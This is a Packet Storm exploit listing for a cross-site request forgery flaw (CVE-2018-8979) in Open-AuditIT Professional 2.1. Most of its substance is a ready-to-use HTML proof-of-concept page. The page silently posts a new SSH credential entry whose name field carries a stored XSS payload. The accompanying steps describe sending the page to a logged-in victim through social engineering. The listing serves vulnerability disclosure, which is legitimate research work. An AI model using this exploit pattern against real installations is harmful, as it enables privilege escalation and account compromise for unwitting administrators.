exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Open-AuditIT Professional 2.1 Cross Site Request Forgery

Open-AuditIT Professional 2.1 Cross Site Request Forgery
Posted Mar 21, 2018
Authored by Nilesh Sapariya

Open-AuditIT Professional version 2.1 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
advisories | CVE-2018-8979
SHA-256 | 8e6847c5839288e1e3fdceee5be2bc421a1c945832bfd25a52a7ecc4ee5afa44

Open-AuditIT Professional 2.1 Cross Site Request Forgery

Change Mirror Download
# Exploit Title: Open-AuditIT Professional 2.1 - Cross-Site Request Forgery (CSRF)
# Date: 27-03-2018
# Exploit Author: Nilesh Sapariya
# Contact: https://twitter.com/nilesh_loganx
# Website: https://nileshsapariya.blogspot.com
# Vendor Homepage: https://www.open-audit.org/
# Software Link : https://www.open-audit.org/downloads.php
# Version: 2.1
# CVE : CVE-2018-8979
# Tested on: Windows 10 Pro
# Category: Webapp Open-AuditIT Professional 2.1


1. Description:-
There is no CSRF protection in Open-AuditIT application, with a little help
of social engineering (like sending a link via email/chat) an attacker may
force the victim to click on a malicious link by which any normal user can
become an Admin user. The attack can force an end user to execute unwanted
actions on a web application in which they're currently authenticated.
Using this vulnerability, we were able to compromise entire user account
with chaining this bug with XSS.



2. Proof of Concept
Login into Open-AuditIT Professional 2.1
Step 1 :- Craft a HTML Page with XSS payload
Step 2:- Save this .html file and send it to victim (Victim should be
loggedin in the browser)
Crafted value will be added.


Affected Code:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/omk/open-audit/credentials"
method="POST">
<input type="hidden" name="data[attributes][name]"
value="<img src=x onerror=alert('hacked');>" />
<input type="hidden"
name="data[attributes][org_id]" value="1" />
<input type="hidden"
name="data[attributes][description]" value="CSRF" />
<input type="hidden" name="data[attributes][type]"
value="ssh" />
<input type="hidden"
name="data[attributes][credentials][username]"
value="test" />
<input type="hidden"
name="data[attributes][credentials][password]"
value="test" />
<input type="hidden" name="data[type]" value="credentials" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


aa3] POCs and steps:
https://nileshsapariya.blogspot.ae/2018/03/csrf-to-xss-open-auditit-professional-21.html


Thanks & Regards,
Nilesh Sapariya
Security Researcher
https://twitter.com/nilesh_loganx
*https://nileshsapariya.blogspot.in




Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close